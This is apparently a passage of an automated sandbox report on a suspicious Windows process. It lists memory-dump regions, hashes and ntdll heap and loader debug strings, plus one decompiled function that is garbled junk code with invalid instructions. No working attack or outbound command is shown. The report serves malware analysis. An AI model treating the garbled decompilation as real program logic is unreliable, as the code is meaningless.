                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$d:\w7rtm\minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                                                                    • API String ID: 0-4103935307
                                                                                                                                                    • Opcode ID: 226a0ea36922ea1163405ce43f82fb251c58d6408d1b543f1243d93811739b12
                                                                                                                                                    • Instruction ID: 320b60c94ce48af17daea47a326b5a0ec14b88de2d717997982abd8672e4c935
                                                                                                                                                    • Opcode Fuzzy Hash: 226a0ea36922ea1163405ce43f82fb251c58d6408d1b543f1243d93811739b12
                                                                                                                                                    • Instruction Fuzzy Hash: 1902BF70A00209DBDB24DFA9D881AFEB7F0FF48704F20852DE956EB651E7749A45DB20
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: DLL name: %wZ DLL path: %wZ$LdrpFindOrMapDll$Status: 0x%08lx$d:\w7rtm\minkernel\ntdll\ldrfind.c
                                                                                                                                                    • API String ID: 0-1394473639
                                                                                                                                                    • Opcode ID: dd29ce84d5082c4b5ea120d619c7cbd4df4e577bbf0fe0e343300c0ab625a5a3
                                                                                                                                                    • Instruction ID: 2c5b89400fe8fd06e219a1c76695cf79cbbc5a45c26131da1152bdffa719d4c8
                                                                                                                                                    • Opcode Fuzzy Hash: dd29ce84d5082c4b5ea120d619c7cbd4df4e577bbf0fe0e343300c0ab625a5a3
                                                                                                                                                    • Instruction Fuzzy Hash: 6232AE72900208EFDF21DFA4C884BEEBBF9BF09304F14806AF955A7261D7709A45EB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00CBDABE
                                                                                                                                                    • HEAP: , xrefs: 00CBDAB3, 00CBDB9B
                                                                                                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00CBDBA6
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00CBDAA6, 00CBDB8E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                                                    • API String ID: 0-1657114761
                                                                                                                                                    • Opcode ID: 734b3d00f02cf8d8e9d188ebebf4e599800a7cc2c67c1c941a38baa3d53dbcd2
                                                                                                                                                    • Instruction ID: cebc9397bb52b71086c4bedd15abffcee71c1323c49ce5662669b4a7f83e8f3a
                                                                                                                                                    • Opcode Fuzzy Hash: 734b3d00f02cf8d8e9d188ebebf4e599800a7cc2c67c1c941a38baa3d53dbcd2
                                                                                                                                                    • Instruction Fuzzy Hash: D602D07160864ACFCB28CF69C484BB9B7F1FF44304F258259E45A8B691E734EE81DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 00CCA4AC
                                                                                                                                                    • HEAP: , xrefs: 00CCA498
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00CCA48B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                                                                    • API String ID: 0-2419525547
                                                                                                                                                    • Opcode ID: 62d82886426971c479911199d761ce6431525566813ebaa681f60451740993f8
                                                                                                                                                    • Instruction ID: 726c01567aafe0897e36708ae9fceda92f41d587790e86a5a81362f74ee75615
                                                                                                                                                    • Opcode Fuzzy Hash: 62d82886426971c479911199d761ce6431525566813ebaa681f60451740993f8
                                                                                                                                                    • Instruction Fuzzy Hash: 3DC2AC71600256CFCB18CF19C498A7A77B1FF94314B29C1A9ECAA9B355D730EE41DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 00CCACD9
                                                                                                                                                    • HEAP: , xrefs: 00CCACC2
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00CCACB5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                                                                    • API String ID: 0-2419525547
                                                                                                                                                    • Opcode ID: acd6c6dd537754ffdf80ae69f652347b2d099040ea32336bb5c8d852161ecbe9
                                                                                                                                                    • Instruction ID: 33bb669bcec3a0ba794d55ba8a0df119e8dc3c35c8ae9a75df10a74834417c1d
                                                                                                                                                    • Opcode Fuzzy Hash: acd6c6dd537754ffdf80ae69f652347b2d099040ea32336bb5c8d852161ecbe9
                                                                                                                                                    • Instruction Fuzzy Hash: 11A2B070904259CFDB29CF65C484BADBBB1FF44304F14819EE8AA9B296D730AE81DF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • Unable to release memory at %p for %p bytes - Status == %x, xrefs: 00CCDC30
                                                                                                                                                    • HEAP: , xrefs: 00CCDC1C
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00CCDC0F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %p bytes - Status == %x
                                                                                                                                                    • API String ID: 0-212623055
                                                                                                                                                    • Opcode ID: 1b5a7b3e6bf45a393cf328234379d342b1dc2d006227ce2b5284e3bae6d29dec
                                                                                                                                                    • Instruction ID: 33699ab5a7e9c548d512881bb97d960d90b9a89acd1e1ebe0b5e1d66a605888e
                                                                                                                                                    • Opcode Fuzzy Hash: 1b5a7b3e6bf45a393cf328234379d342b1dc2d006227ce2b5284e3bae6d29dec
                                                                                                                                                    • Instruction Fuzzy Hash: B772D47190025A9FDB24CF69C885BBDBBF0FF09314F14805DE9AAAB291D734A941EF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                    			E0027BF7F(signed int __eax, signed char __ebx, signed int __ecx, signed int* __edx, intOrPtr* __edi, intOrPtr* __esi, void* __fp0) {
                                                                                                                                                    				signed char _t441;
                                                                                                                                                    				signed char _t443;
                                                                                                                                                    				signed int _t445;
                                                                                                                                                    				signed int _t446;
                                                                                                                                                    				intOrPtr* _t449;
                                                                                                                                                    				signed char _t450;
                                                                                                                                                    				signed char _t451;
                                                                                                                                                    				signed char _t458;
                                                                                                                                                    				intOrPtr* _t843;
                                                                                                                                                    				intOrPtr* _t847;
                                                                                                                                                    				signed char _t848;
                                                                                                                                                    				signed char _t849;
                                                                                                                                                    				signed int _t850;
                                                                                                                                                    				void* _t851;
                                                                                                                                                    				signed char _t853;
                                                                                                                                                    				signed char _t854;
                                                                                                                                                    				void* _t855;
                                                                                                                                                    				signed char _t856;
                                                                                                                                                    				void* _t857;
                                                                                                                                                    				signed int _t885;
                                                                                                                                                    				intOrPtr* _t1037;
                                                                                                                                                    				intOrPtr* _t1041;
                                                                                                                                                    				void* _t1042;
                                                                                                                                                    				void* _t1054;
                                                                                                                                                    				signed char _t1063;
                                                                                                                                                    				void* _t1392;
                                                                                                                                                    
                                                                                                                                                    				_t1392 = __fp0;
                                                                                                                                                    				_t1041 = __esi;
                                                                                                                                                    				_t1037 = __edi;
                                                                                                                                                    				_t1002 = __edx;
                                                                                                                                                    				_t885 = __ecx;
                                                                                                                                                    				_t854 = __ebx;
                                                                                                                                                    				_t441 = __eax | 0xffff263a;
                                                                                                                                                    				asm("invalid");
                                                                                                                                                    				_pop(ss);
                                                                                                                                                    				asm("adc [ebx], ecx");
                                                                                                                                                    				if(_t441 == 0) {
                                                                                                                                                    					 *_t441 =  *_t441 + _t441;
                                                                                                                                                    					 *((intOrPtr*)(__ecx + 0x7b750b11)) =  *((intOrPtr*)(__ecx + 0x7b750b11)) + _t1042;
                                                                                                                                                    					 *_t441 =  *_t441 + _t441;
                                                                                                                                                    					 *((intOrPtr*)(__edi + 0x5d)) =  *((intOrPtr*)(__edi + 0x5d)) + _t1042;
                                                                                                                                                    					 *_t441 =  *_t441 + _t441;
                                                                                                                                                    					asm("fcom qword [ecx]");
                                                                                                                                                    					 *__edx =  *__edx | __ecx;
                                                                                                                                                    					_push(es);
                                                                                                                                                    					_t847 = (_t441 |  *_t441) -  *(_t441 |  *_t441) -  *((intOrPtr*)((_t441 |  *_t441) -  *(_t441 |  *_t441)));
                                                                                                                                                    					 *_t847 =  *_t847 + _t847;
                                                                                                                                                    					 *_t847 =  *_t847 + __edx;
                                                                                                                                                    					 *_t847 =  *_t847 + _t847;
                                                                                                                                                    					_t848 = _t847 +  *_t847;
                                                                                                                                                    					asm("insd");
                                                                                                                                                    					_t1002 = __edx + __ecx;
                                                                                                                                                    					_push(__edi);
                                                                                                                                                    					L2:
                                                                                                                                                    					 *_t1037 =  *_t1037 + _t1002;
                                                                                                                                                    					 *_t848 =  *_t848 + _t848;
                                                                                                                                                    					 *_t848 =  *_t848 + _t848;
                                                                                                                                                    					asm("adc esi, [eax]");
                                                                                                                                                    					_t849 = _t848;
                                                                                                                                                    					_push(_t1002);
                                                                                                                                                    					 *_t849 =  *_t849 + _t849;
                                                                                                                                                    					 *_t1037 =  *_t1037 + _t885;
                                                                                                                                                    					 *_t885 =  *_t885 + _t1002;
                                                                                                                                                    					 *_t849 =  *_t849 + _t849;
                                                                                                                                                    					 *_t849 =  *_t849 + _t849;
                                                                                                                                                    					_t850 = _t849 + 0xa;
                                                                                                                                                    					ss = es;
                                                                                                                                                    					_t885 = _t885 +  *[cs:ebx];
                                                                                                                                                    					 *_t850 =  *_t850 & _t850;
                                                                                                                                                    					_t854 = _t854 +  *((intOrPtr*)(_t854 - 0x47)) +  *((intOrPtr*)(_t854 +  *((intOrPtr*)(_t854 - 0x47)) - 0x46));
                                                                                                                                                    					 *_t850 =  *_t850 + _t850;
                                                                                                                                                    					_t851 = _t850 + 0x1f;
                                                                                                                                                    					asm("adc [ebp+0x10000ae], cl");
                                                                                                                                                    					L3:
                                                                                                                                                    					 *0xdcd0 =  *0xdcd0 + _t1054;
                                                                                                                                                    					_t853 = _t851 + 0x00000028 ^ 0x6f0a0001;
                                                                                                                                                    					 *[ss:eax] =  *[ss:eax] + _t853;
                                                                                                                                                    					_t848 = _t853 |  *_t853;
                                                                                                                                                    					_t1054 = _t1054 -  *_t848;
                                                                                                                                                    					 *_t1002 =  *_t1002 + _t848;
                                                                                                                                                    					if( *_t1002 != 0) {
                                                                                                                                                    						goto L2;
                                                                                                                                                    					}
                                                                                                                                                    					 *_t848 =  *_t848 + _t848;
                                                                                                                                                    					_t441 = _t848 + 0x1e;
                                                                                                                                                    					_t1042 = _t1041 + 0x25010000;
                                                                                                                                                    					asm("rcr ch, 1");
                                                                                                                                                    					 *_t441 =  *_t441 + _t441;
                                                                                                                                                    				}
                                                                                                                                                    				_t443 = _t441 + 0x00000028 ^ 0x6f0a0001;
                                                                                                                                                    				 *[ss:eax] =  *[ss:eax] + _t443;
                                                                                                                                                    				_t445 = (_t443 |  *_t443) -  *(_t443 |  *_t443);
                                                                                                                                                    				 *_t1002 =  *_t1002 + _t885;
                                                                                                                                                    				while(1) {
                                                                                                                                                    					L6:
                                                                                                                                                    					 *_t445 =  *_t445 + _t445;
                                                                                                                                                    					asm("adc esi, [eax]");
                                                                                                                                                    					 *_t445 =  *_t445 + _t445;
                                                                                                                                                    					_t446 = _t445;
                                                                                                                                                    					 *_t446 =  *_t446 + _t446;
                                                                                                                                                    					 *_t446 =  *_t446 | _t446;
                                                                                                                                                    					 *_t885 =  *_t885 + _t1002;
                                                                                                                                                    					while(1) {
                                                                                                                                                    						L7:
                                                                                                                                                    						asm("adc [eax], eax");
                                                                                                                                                    						_t855 = _t854 +  *((intOrPtr*)(_t854 - 0x48));
                                                                                                                                                    						 *_t446 =  *_t446 + _t446;
                                                                                                                                                    						_push(es);
                                                                                                                                                    						_t449 = _t446 + 0xa -  *((intOrPtr*)(_t446 + 0xa)) -  *_t1041;
                                                                                                                                                    						 *_t1002 =  *_t1002 + _t449;
                                                                                                                                                    						_t1037 = _t1037 +  *(_t1042 - 0x48);
                                                                                                                                                    						 *_t449 =  *_t449 + _t449;
                                                                                                                                                    						_t450 = _t449 + 0x2a;
                                                                                                                                                    						asm("into");
                                                                                                                                                    						 *_t1002 =  *_t1002 + _t450;
                                                                                                                                                    						 *_t1002 =  *_t1002 - _t855;
                                                                                                                                                    						 *_t450 =  *_t450 + _t450;
                                                                                                                                                    						_t451 = _t450 |  *_t450;
                                                                                                                                                    						_t856 = _t855 +  *((intOrPtr*)(_t1041 + 0x45));
                                                                                                                                                    						_t1063 = _t856;
                                                                                                                                                    						L9:
                                                                                                                                                    						while(1) {
                                                                                                                                                    							if(_t1063 > 0) {
                                                                                                                                                    								 *_t451 =  *_t451 + _t451;
                                                                                                                                                    								_t856 = _t856 |  *(_t1042 - 0x48);
                                                                                                                                                    								 *_t451 =  *_t451 + _t451;
                                                                                                                                                    								_t451 = _t451 + 2;
                                                                                                                                                    								if(_t451 >= 0) {
                                                                                                                                                    									L15:
                                                                                                                                                    									 *_t1002 =  *_t1002 + _t885;
                                                                                                                                                    									if ( *_t1002 >= 0) goto L9;
                                                                                                                                                    								} else {
                                                                                                                                                    									 *_t451 =  *_t451 + _t451;
                                                                                                                                                    									_t854 = _t856 |  *(_t1042 - 0x46);
                                                                                                                                                    									 *_t451 =  *_t451 + _t451;
                                                                                                                                                    									_t445 = _t451 + 2;
                                                                                                                                                    									if(_t445 != 0) {
                                                                                                                                                    										goto L6;
                                                                                                                                                    									} else {
                                                                                                                                                    										 *_t445 =  *_t445 + _t445;
                                                                                                                                                    										_t446 = _t445 + 0x17;
                                                                                                                                                    										asm("outsd");
                                                                                                                                                    										 *_t1002 =  *_t1002 + _t885;
                                                                                                                                                    										 *_t1002 =  *_t1002 + _t446;
                                                                                                                                                    										_pop(ss);
                                                                                                                                                    										if( *_t1002 >= 0) {
                                                                                                                                                    											goto L7;
                                                                                                                                                    										} else {
                                                                                                                                                    											 *_t446 =  *_t446 + _t446;
                                                                                                                                                    											_t843 = _t446 + 0x2a;
                                                                                                                                                    											 *_t843 =  *_t843 + _t843;
                                                                                                                                                    											asm("adc esi, [eax]");
                                                                                                                                                    											_t458 = _t854;
                                                                                                                                                    											_t857 = _t843 +  *_t843;
                                                                                                                                                    											 *_t458 =  *_t458 + _t458;
                                                                                                                                                    											 *_t1037 =  *_t1037 + _t885;
                                                                                                                                                    											 *_t885 =  *_t885 + _t1002;
                                                                                                                                                    											 *_t1002 =  *_t1002 + _t458;
                                                                                                                                                    											 *_t1002 =  *_t1002 - _t857;
                                                                                                                                                    											 *_t458 =  *_t458 + _t458;
                                                                                                                                                    											_t451 = _t458 |  *_t458;
                                                                                                                                                    											_t856 = _t857 +  *((intOrPtr*)(_t1041 + 0x45));
                                                                                                                                                    											 *_t451 =  *_t451 + _t451;
                                                                                                                                                    											goto L15;
                                                                                                                                                    										}
                                                                                                                                                    									}
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					goto L3;
                                                                                                                                                    				}
                                                                                                                                                    			}





























                                                                                                                                                    0x0027c05c
                                                                                                                                                    0x0027c05e
                                                                                                                                                    0x0027c060
                                                                                                                                                    0x0027c063
                                                                                                                                                    0x0027c065
                                                                                                                                                    0x0027c067
                                                                                                                                                    0x0027c068
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0027c06a
                                                                                                                                                    0x0027c06a
                                                                                                                                                    0x0027c06c
                                                                                                                                                    0x0027c06e
                                                                                                                                                    0x0027c070
                                                                                                                                                    0x0027c074
                                                                                                                                                    0x0027c074
                                                                                                                                                    0x0027c075
                                                                                                                                                    0x0027c077
                                                                                                                                                    0x0027c07a
                                                                                                                                                    0x0027c07c
                                                                                                                                                    0x0027c07e
                                                                                                                                                    0x0027c080
                                                                                                                                                    0x0027c082
                                                                                                                                                    0x0027c084
                                                                                                                                                    0x0027c087
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0027c087
                                                                                                                                                    0x0027c068
                                                                                                                                                    0x0027c05a
                                                                                                                                                    0x0027c04f
                                                                                                                                                    0x0027c08b
                                                                                                                                                    0x0027c044
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0027c023

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243172465.0000000000272000.00000020.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243165092.0000000000270000.00000002.00020000.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243237553.0000000000320000.00000002.00020000.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: athan
                                                                                                                                                    • API String ID: 0-369431050
                                                                                                                                                    • Opcode ID: af50e787f93ea5336b5c0ea21d47c5584112e4cc5d717b16913e89f4ab765763
                                                                                                                                                    • Instruction ID: 6e757d670470ffaefd1b0e3e2b167f4f2005c71fa52c45176bd29b71bfb57679
                                                                                                                                                    • Opcode Fuzzy Hash: af50e787f93ea5336b5c0ea21d47c5584112e4cc5d717b16913e89f4ab765763
                                                                                                                                                    • Instruction Fuzzy Hash: CF433B6140E7C29FCB434BB85C712E1BFB4AE5722431E49DBC4C08F4A3D229696AD776
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x), xrefs: 00CC9636
                                                                                                                                                    • HEAP: , xrefs: 00CC9623
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00CC9616
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)
                                                                                                                                                    • API String ID: 0-385592399
                                                                                                                                                    • Opcode ID: c75493c8c3f9f8d825cd3baa9e3c7a0b43d1ef813c66c038e006d723bb1ba99a
                                                                                                                                                    • Instruction ID: dad1eb5703749a7cb7d68434e7cf6e193bca275477fc46304549381006263b3b
                                                                                                                                                    • Opcode Fuzzy Hash: c75493c8c3f9f8d825cd3baa9e3c7a0b43d1ef813c66c038e006d723bb1ba99a
                                                                                                                                                    • Instruction Fuzzy Hash: 78D1CD71A00656DFCF15CFA9C588BBAB7F0FB08300F258199E5659B285D730EE01EB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 00CD2D1F
                                                                                                                                                    • HEAP: , xrefs: 00CD2D14
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00CD2D07
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                                                                                                                    • API String ID: 0-1596344177
                                                                                                                                                    • Opcode ID: 3560b0b02d9bf1572a9db8de336db084633405657c25bb8c9971899240cf29fb
                                                                                                                                                    • Instruction ID: 5d39645debfb03e91c1c60fc55a28632cbbee453688ef898fab4b2f54d18e9ce
                                                                                                                                                    • Opcode Fuzzy Hash: 3560b0b02d9bf1572a9db8de336db084633405657c25bb8c9971899240cf29fb
                                                                                                                                                    • Instruction Fuzzy Hash: F3B1B171600646CFCB28DF29C484A79B7F1FF89314B158669E8668F782D730EE81DB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • Heap block at %p modified at %p past requested size of %lx, xrefs: 00CF58F7
                                                                                                                                                    • HEAP: , xrefs: 00CF58E4
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00CF58D7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %lx
                                                                                                                                                    • API String ID: 0-3722492067
                                                                                                                                                    • Opcode ID: b55d82d100c22ba2fa316655785a6bd5ba22f239bbf480bcf9db59a27b81d3b7
                                                                                                                                                    • Instruction ID: a0579e40b123cd9d4f7ac364984fb224e2d5ec15ddb66d3b04429b4029d78c5f
                                                                                                                                                    • Opcode Fuzzy Hash: b55d82d100c22ba2fa316655785a6bd5ba22f239bbf480bcf9db59a27b81d3b7
                                                                                                                                                    • Instruction Fuzzy Hash: 45411334250918DBC3A49F1AC844AB277E0EF05790B954859FBD5CF2C1D631DD46EB62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
